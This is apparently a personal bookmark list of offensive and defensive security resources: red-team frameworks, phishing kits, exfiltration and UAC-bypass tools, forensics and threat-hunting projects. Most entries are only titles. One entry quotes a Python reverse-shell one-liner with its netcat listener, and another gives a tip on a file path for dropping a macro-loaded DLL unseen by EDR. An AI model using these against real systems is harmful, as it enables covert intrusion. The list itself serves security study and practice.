- DumpsterFire: "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
- Machine Learning for Red Teams, Part 1
- Flying under the radar: Hack into a „highly protected“ company without getting caught
- demiguise: HTA encryption tool for RedTeams
- Sn1per: Automated pentest framework for offensive security experts
- jenkins-shell: Automating Jenkins Hacking using Shodan API
- Cobalt Strike: is software for Adversary Simulations and Red Team Operations. 3.13 release notes
- Red Team's SIEM: easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- The-Hacker-Playbook-3-Translation: 对 The Hacker Playbook 3 的翻译。
- How Do I Prepare to Join a Red Team?
- Red Team & Physical Entry Gear
- Red Team Techniques: Gaining access on an external engagement through spear-phishing
- Phantom Tap (PhanTap): an ‘invisible’ network tap aimed at red teams.
- So You Want to Run a Red Team Operation: I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization.
- Alternative C2 for Red Teamers: Koadic Command & Control Framework. Koadic C3 COM Command & Control - JScript RAT
- tunning tip: if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
- dnstwist
- Plight At The End Of The Tunnel
- dref: DNS Rebinding Exploitation Framework
- dns-rebind-toolkit: A front-end JavaScript toolkit for creating DNS rebinding attacks.
- Bypass firewalls by abusing DNS history: Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
- dnstwist: Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
- Can I take over XYZ?: a list of services and how to claim (sub)domains with dangling DNS records.
- SubR3con: is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go
- TakeOver-v1: script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability.
- subzy: Subdomain takeover vulnerability checker.
- Subdomain Takeover Scanner
- subdomain-takeover: SubDomain TakeOver Scanner by 0x94.
- DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. dnscrypt-proxy 2, resolvers and docker image.
- Script for searching the extracted firmware file system for goodies!
- DKMC - Dont kill my cat: Malicious payload evasion tool
- Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
- gitleaks: Searches full repo history for secrets and keys
- Twitter Scraper
- BloodHound: Six Degrees of Domain Admin, and a Python based ingestor for BloodHound
- tinfoleak (github):The most complete open-source tool for Twitter intelligence analysis
- Social IDs: Get user ids from social network handlers
- SpookFlare: Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures.
- Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
- Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
- BurpExtension-WhatsApp-Decryption-CheckPoint
- Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
- accountanalysis: This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often.
- How to get authentication key from SNMPv3 packets
- AtomicTestsCommandLines.txt: Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
- whois | GTFOBins: hangs waiting for the remote peer to close the socket. github
- Browsers affected by the History API DoS
- PacketWhisper: Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography
- Using Google Analytics for data extraction
- Exfiltrating credentials via PAM backdoors & DNS requests
- Building simple DNS endpoints for exfiltration or C&C
- CheckPlease: Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.
- okhttp-peer-certificate-extractor: This tool extracts peer certificates from given certificates.
- DET: (extensible) Data Exfiltration Toolkit (DET)
- awesome-python-login-model: login access for webscrapping.
- Hamburglar: collect useful information from urls, directories, and files.
- Giggity: grab hierarchical data about a github organization, user, or repo.
- I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch): nc -lnvp 1234 / python3 -c "# 107, single statement, non-blocking import("subprocess").Popen("sh",0,None,*[ import("socket").create_connection(("",1234))]3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,[ socket.create_connection(("",1234))]*3)"
- Living Off The Land Binaries and Scripts (and also Libraries) - github
- Exfiltrate Like a Pro: Using DNS over HTTPS as a C2 Channel
- Awesome Asset Discovery: List of Awesome Asset Discovery Resources
- Phishing on Twitter
- evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
- shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
- pompa: Fully-featured spear-phishing toolkit - web front-end.
- ..Modlishka..: Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
- Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
- Lure: User Recon Automation for GoPhish
- Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
- O-Saft: OWASP SSL advanced forensic tool
- PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
- swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
- The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
- Invoke-LiveResponse
- Linux Forensics
- CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
- mac_apt: macOS Artifact Parsing Tool
- MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
- imago-forensics: Imago is a python tool that extract digital evidences from images.
- remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
- Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
- libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
- usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
- (pt-br)Analisando ameaças com Mitre ATT&CK Navigator
- ATT&CK™ Navigator: Web app that provides basic navigation and annotation of ATT&CK matrices github.
- Awesome Honeypots: A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects.
- Blue Team Fundamentals.
- Blue Team fundamentals Part Two: Windows Processes.
- Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
- Talos Blog || Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Adwind Dodges AV via DDE
- strelka: Scanning files at scale with Python and ZeroMQ
- Threat-Hunting: Personal compilation of APT malware from whitepaper releases, documents and own research
- ThreatHunter-Playbook: A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.
- HELK - The Hunting ELK: The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
- mordor: Re-play Adversarial Techniques.
- MISP (core software) - Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
- MISP galaxy: Clusters and elements to attach to MISP events or attributes (like threat actors)
- ioc_writer: Provide a python library that allows for basic creation and editing of OpenIOC objects.
- Sigma: Generic Signature Format for SIEM Systems
- Events Heatmap
- RedELK: Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
- plaso: Super timeline all the things.
- Heatmaps Make Ops Better
- graylog-guide-snort: How to send structured Snort IDS alert logs into Graylog
- TALR: Threat Alert Logic Repository
- Auditing Continuously vs. Monitoring Continuously
- Logsspot: Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence.
- Corsair: Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC).
- Bypassing Browser Security Warnings with Pseudo Password Fields
- The 9 Lives of Bleichenbacher's CAT: New Cache ATtacks on TLS Implementations
- How To Blow Your Online Cover With URL Previews
- Nefarious LinkedIn: A look at how LinkedIn exfiltrates extension data from your browser.
- Lightnion: A light version of Tor portable to the browser.
- Puppeteer: Headless Chrome Node API. site
- uBlock Origin: An efficient blocker for Chromium and Firefox. Fast and lean.
- Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
- bochspwn-reloaded: A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
- drltrace: Drltrace is a library calls tracer for Windows and Linux applications.
- shellz: is a small utility to track and control your ssh, telnet, web and custom shells.
- CLIP OS: Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
- How to Get Started With VMware vSphere Security « vMiss.net
- routeros: RouterOS Bug Hunt Materials Presented at Derbycon 2018
- Awesome-Study-Resources-for-Kernel-Hacking: Kernel Hacking study materials collection
- Skadi: Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux.
- uefi-jitfuck: A JIT compiler for Brainfuck running on x86_64 UEFI
- Secure Boot in the Era of the T2: Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot.
- PSPTool: Display, extract, and manipulate PSP firmware inside UEFI images
- Project Mu: is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern. github repo
- Awesome Advanced Windows Exploitation References
- windows kernel security development
- A process scanner detecting and dumping hollowed PE modules.
- dll_to_exe: Converts a DLL into EXE
- pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
- A PowerShell utility to dynamically uncover a DCShadow attack
- Security Research from the Microsoft Security Response Center (MSRC)
- DCSYNCMonitor
- Total Meltdown?
- DetectionLab: Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post here
- powerlessshell: Run PowerShell command without invoking powershell.exe.
- internal-monologue: Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
- Robber is open source tool for finding executables prone to DLL hijacking
- Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
- Remote-Desktop-Caching
- LogRM: LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou
- InvisiblePersistence: Persisting in the Windows registry "invisibly"
- Dynamic Tracing in Windows 10 19H1
- Capturing NetNTLM Hashes with Office [DOT] XML Documents
- LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
- Passing-the-Hash to NTLM Authenticated Web Applications
- Detours: Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
- r0ak: r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
- SpeculationControl: SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
- Reverse Engineering Windows Defender (by Alexei Bulazel): pdf and videos
- Ground Zero: Part 2-2 XOR encryption – Windows x64
- Ground Zero: Part 2-3 Building Cracked Binaries – Windows x64
- EKFiddle: A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.
- Windows Command-Line: Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
- MSconsole: Windows Console Tools
- PowerShell Remoting by Stephanos Constantinou Blog
- BloodHound Database Creator: This python script will generate a randomized data set for testing BloodHound features and analysis.
- Windows Privilege Escalation (Unquoted Path Service)
- DbgShell: A PowerShell front-end for the Windows debugger engine.
- Windows Incident Response: Updates
- pe_to_shellcode: Converts PE into a shellcode
- Win 10 related research
- UAC bypass using CreateNewLink COM interface
- Remote NTLM relaying through meterpreter on Windows port 445, DivertTCPconn: A TCP packet diverter for Windows platform.
- Analyzing obfuscated powershell with shellcode, Empire is a PowerShell and Python post-exploitation agent.
- Suspicious Use of Procdump: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
- relayer: SMB Relay Attack Script
- Ps1jacker: Ps1jacker is a tool for generating COM Hijacking payload.
- python-dotnet-binaryformat: Pure Python parser for data encoded by .NET's BinaryFormatter
- WinPwnage: Elevate, UAC bypass, privilege escalation, dll hijack techniques
- Invoke-PSImage: Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
- Firework: Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
- hUACME: Defeating Windows User Account Control
- SysmonTools: Utilities for Sysmon
- sysmon-config: Sysmon configuration file template with default high-quality event tracing.
- Sysmon: how to set up, update and use?
- Panache_Sysmon: Just another sysmon config
- Hiding malware in Windows – The basics of code injection
- Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. announcement
- Bypassing AppLocker Custom Rules: 0x09AL Security blog
- Detailed properties in the Office 365 audit log
- SpecuCheck: SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
- stager.dll: Code from this article
- RID-Hijacking: Windows RID Hijacking persistence technique
- WSL Reloaded
- Windows oneliners to download remote payload and execute arbitrary code
- reflectivepotato: MSFRottenPotato built as a Reflective DLL. Work in progress.
- randomrepo: Repo for random stuff
- Microsoft Windows win32k.sys: Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
- rdpy: Remote Desktop Protocol in Twisted Python
- SharpWeb: NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
- reconerator: C# Targeted Attack Reconnissance Tools
- ManbagedInjection: A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
- InveighZero: C# LLMNR/NBNS spoofer
- DanderSpritz Lab: A fully functional DanderSpritz lab in 2 commands.
- Lateral movement using URL Protocol gist
- HiddenPowerShell: This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker.
- One Windows Kernel.
- The Dog Whisperer’s Handbook: This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module.
- Attack and Defend microsoft enhanced security administrative environment
- raw-socket-snifferr: Packet capture on Windows without a kernel drive
- DCOMrade: Powershell script for enumerating vulnerable DCOM Applications
- shed: .NET runtime inspector
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
- How to steal NTLMv2 hashes using file download vulnerability in web application
- Securing SCOM in a Privilege Tiered Access Model–Part 1
- Simpleator: ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
- WinDbg-Samples: Sample extensions, scripts, and API uses for WinDbg.
- Windows Privilege Escalation Guide: This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
- OrgKit: Provision a brand-new company with proper defaults in Windows, Offic365, and Azure
- Leveraging WSUS.
- windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
- azucar: Security auditing tool for Azure environments
- volatility-wnf: Browse and dump Windows Notification Facilities.
- NetNTLMtoSilverTicket: SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket.
- Domain Goodness – How I Learned to LOVE AD Explorer
- Yet another sdclt UAC bypass: As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
- awesome-windows-kernel-security-development: windows kernel security development.
- An introduction to privileged file operation abuse on Windows: This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- Excel4-DCOM: PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).
- ALPC-BypassUAC: UAC Bypass with mmc via alpc.
- ThreadBoat: Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
- ManagedPasswordFilter: Windows Password Filter that uses managed code internally
- DeviceGuardBypasses: A repository of some of my Windows 10 Device Guard Bypasses
- rifiuti2: Windows Recycle Bin analyser
- Control Flow Guard Teleportation: The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. demo
- Down the Rabbit-Hole...: It wouldn’t make sense if an unprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. ctftool - Interactive CTF Exploration Tool
- Reversing and Patching .NET Binaries with Embedded References
- Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
- Windows PowerShell Remoting: Host Based Investigation and Containment Techniques.
- .NET Manifesto: win friends and influence the loader. malwariaLabs. slides from derbycon 2019
- Bypassing Windows User Account Control
- symboliclink-testing-tools: This is a small suite of tools to test various symbolic link types of Windows.
- Run PowerShell without Powershell.exe — Best tools & techniques
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
- Active Directory Control Paths
- Gaining Domain Admin from Outside Active Directory, using Responder(LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
- Invoke-ADLabDeployer: Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
- PowerShellClassLab: This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server.
- ADImporter
- Low Privilege Active Directory Enumeration from a non-Domain Joined Host
- Active Directory as a C2
- Escalating privileges with ACLs in Active Directory
- Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- #TR19 Active Directory Security Track
- Penetration Testing Active Directory, Part I: I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD.
- Penetration Testing Active Directory, Part II: For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation.
- Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.
- Exploiting PrivExchange: The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host.
- Case Study: Password Analysis with BloodHound
- Bypassing AD account lockout for a compromised account
- Azure AD and ADFS best practices: Defending against password spray attacks
- windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
- LDAP Ping and Determining Your Machine’s Site
- Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
- Active Directory administrative tier model
- Exchange-AD-Privesc: Exchange privilege escalations to Active Directory
- Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to a Privilege Escalation
- Hunting for reconnaissance activities using LDAP search filters
- Faking an AD account password change is possible , but detectable..
- Active Directory Kill Chain Attack & Defense: This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
- A little tool to play with Windows security
- Preventing Mimikatz Attacks – Blue Team – Medium
- pypykatz: Mimikatz implementation in pure Python
- Walk-through Mimikatz sekurlsa module
- An iOS App In Assembly
- Having fun with macOS 1days
- x18-leak: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.
- EmPyre: A post-exploitation OS X/Linux agent written in Python 2.7
- SDQAnalyzer: a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol.
- Inside Code Signing
- jelbrekTime: An developer jailbreak for Apple watch S3 watchOS 4.1
- Disabling MacOS SIP via a VirtualBox kext Vulnerability
- mOSL: Bash script to audit and fix macOS High Sierra (10.13.x) security settings
- Objective-See:
- DoNotDisturb: Detect Evil Maid Attacks
- sniffMK: sniff mouse and keyboard events
- Remote Mac Exploitation Via Custom URL Schemes
- The Mac Malware of 2018
- KisMac2: KisMAC is a free, open source wireless stumbling and security tool for Mac OS X.
- osx-security-awesome: A collection of OSX and iOS security resources
- threadexec: A library to execute code in the context of other processes on iOS 11.
- Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
- iOS12 Kernelcache Laundering
- kernelcache-laundering: load iOS12 kernelcaches and PAC code in IDA
- Armor: is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Tool Designed To Create Encrypted macOS Payloads
- inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
- opendrop: An open Apple AirDrop implementation written in Python
- A sample of the iOS malware- sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
- ipwndfu: open-source jailbreaking tool for older iOS devices.
- tip toeing past android 7’s network security configuration
- A Story About Three Bluetooth Vulnerabilities in Android
- Creating an Android Open Source Research Device on Your PC
- Droidefense: Advance Android Malware Analysis Framework
- android-device-check: Check Android device security settings
- Project Zero: OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
- I'm looking at a Huawei P20 from China, let see what can I found
- BCC: Tools for BPF-based Linux IO analysis, networking, monitoring, and more
- OpenSnitch is a GNU/Linux port of the Little Snitch application firewall
- Security Onion:Linux distro for IDS, NSM, and Log Management
- Linux Kernel Defence Map
- wcc: The Witchcraft Compiler Collection
- Linux x86 Reverse Shell Shellcode
- Ground Zero: Reverse Engineering:
- Part 1-2: Password Protected Reverse Shells – Linux x64
- Active Directory Dojo:
- Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
- Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
- Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
- Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh
- Dmesg under the hood: Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user.
- Randomize your MAC address using NetworkManager
- Shadow-Box: Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - presentation and other papers
- mem-loader.asm: Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by x-c3ll
- Privilege Escalation: pentestbook
- Project Zero: A cache invalidation bug in Linux memory management
- Announcing flickerfree boot for Fedora 29
- The Linux Backdoor Attempt of 2003
- (PT-BR) Análise de binários em Linux
- GMER: Rootkit Detector and Remover
- suprotect: Changing memory protection in an arbitrary process
- A look at home routers, and a surprising bug in Linux/MIPS
- (pt-br) Hacking Tricks: Escalação de Privilégio em Linux com Capability
- Basic Linux Privilege Escalation: It's just a basic & rough guide.
- Linux process infection (part I):Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence.
- tpotce: T-Pot Universal Installer and ISO Creator.
- Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials: LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
- Linux Kernel exploitation Tutorial.
- The 101 of ELF files on Linux: Understanding and Analysis - Linux Audit
- ebpf_exporter: Prometheus exporter for custom eBPF metrics
- Zydra: is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords.
- A gentle introduction to Linux Kernel fuzzing - code
- Teardown of a Failed Linux LTS Spectre Fix: Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels.
- Ropstar: Automatic exploit generation for simple linux pwn challenges.
- Scout Suite: Multi-Cloud Security Auditing Tool
- Cloud Security Research: Cloud-related research releases from the Rhino Security Labs team.
- git-secrets: Prevents you from committing secrets and credentials into git repositories.
- CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
- Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
- my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
- RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
- FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
- AWS IAM privileges as found using the AWS Policy Generator described at
- Qualcomm chain-of-trust
- Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones. github
- Logitech keyboards and mice vulnerable to extensive cyber attacks
- Network Security Monitoring on Raspberry Pi type devices
- A secure, shared workspace for secrets
- bettercap, the Swiss army knife for network attacks and monitoring.
- Tool Analysis Result Sheet and guide, via Detecting Lateral Movement through Tracking Event Logs by jpcertcc
- EKOLABS tools repo
- Vapor PwnedPasswords Provider: Package for testing a password against Pwned Passwords V2 API in Vapor
- Is my password pwned?, bash script
- XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
- CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
- Enterprise Password Quality Checking using any hash data sources (HaveIBeenPwned lists, et al)
- DockerAttack: Various Tools and Docker Images
- PyREBox is a Python scriptable Reverse Engineering sandbox
- find3: High-precision indoor positioning framework, version 3
- structured-text-tools: A list of command line tools for manipulating structured text data
- telnetlogger: Simulates enough of a Telnet connection in order to log failed login attempts.
- vault: A tool for secrets management, encryption as a service, and privileged access management
- WeakNet LINUX 8: This is an information-security themed distribution that has been in development since 2010.
- HiTB: It was a part of HackTheBox platform.
- arphid: DYI 125KHz RFID read/write/emulate guide
- Pybelt: The hackers tool belt
- mhax
- U2F Support Firefox Extension
- git-bug: Distributed bug tracker embedded in Git
- mkcert: A simple zero-config tool to make locally trusted development certificates with any names you'd like
- trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
- Polymorph is a real-time network packet manipulation framework with support for almost all existing protocols
- query_huawei_wifi_router: A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
- kravatte: Implementation of Kravatte Encryption Suite
- atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.
- noisy: Simple random DNS, HTTP/S internet traffic noise generator
- infernal-twin: wireless hacking - This is automated wireless hacking tool
- Google Chromium, sans integration with Google
- Gammux: A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images.
- PDF Tools
- openvotenetwork: Implementation of anonymous Open Vote Network in go
- put2win: Script to automatize shell upload by PUT HTTP method to get meterpreter
- Tools by Morphus Labs
- Stratosphere IPS
- Convert nmap Scans into Beautiful HTML Pages
- Shellab: Linux and Windows shellcode enrichment utility
- GeoInt
- Cartero: Social Engineering Framework
- python-nubia: A command-line and interactive shell framework.
- nipe: is a script to make Tor Network your default gateway.
- fuxploider: File upload vulnerability scanner and exploitation tool.
- solo: FIDO2 USB+NFC token optimized for security, extensibility, and style
- Joint Report On Publicly Available Hacking Tools: by Canadian Centre for Cyber Security.
- social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
- TheHive: a Scalable, Open Source and Free Security Incident Response Platform
- APTSimulator: A toolset to make a system look as if it was the victim of an APT attack
- debugger-netwalker: NetWalker Debugger
- USB armory: open source flash-drive-sized computer
- batch_deobfuscator: Deobfuscate batch scripts obfuscated using string substitution and escape character techniques.
- Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
- Big List of Naughty Strings
- Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud - diffy repo.
- Command-Line Snippets: A place to share useful, one-line commands that make your life easier.
- IP-to-ASN - Team Cymru
- 4nonimizer: A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN).
- free Entropy Service.
- Correct Horse Battery Staple: Secure password generator to help keep you safer online. code
- CorrectHorse: random secure password generator.
- XKCD-password-generator: Generate secure multiword passwords/passphrases, inspired by XKCD
- Using a Hardened Container Image for Secure Applications in the Cloud
- freedomfighting: A collection of scripts which may come in handy during your freedom fighting activities.
- Machine Learning and Security: Source code about machine learning and security.
- octofairy: A machine learning based GitHub bot for Issues.
- kbd-audio: Tools for capturing and analysing keyboard input paired with microphone capture
- certstreamcatcher: This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks.
- Wifiphisher: is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.
- chezmoi: Manage your dotfiles securely across multiple machines.
- hexyl: A command-line hex viewer.
- Giggity: Wraps github api for openly available information about an organization, user, or repo.
- howmanypeoplearearound: Count the number of people around you  by monitoring wifi signals .
- LASCAR: Ledger's Advanced Side-Channel Analysis Repository.
- Hostintel: A Modular Python Application To Collect Intelligence For Malicious Hosts - github
- DarkNet_ChineseTrading
- mXtract: Memory Extractor & Analyzer.
- commando-vm: a fully customized, Windows-based security distribution for penetration testing and red teaming.
- DarkSearch: The 1st real Dark Web search engine (Darksearch vs Ahmia)
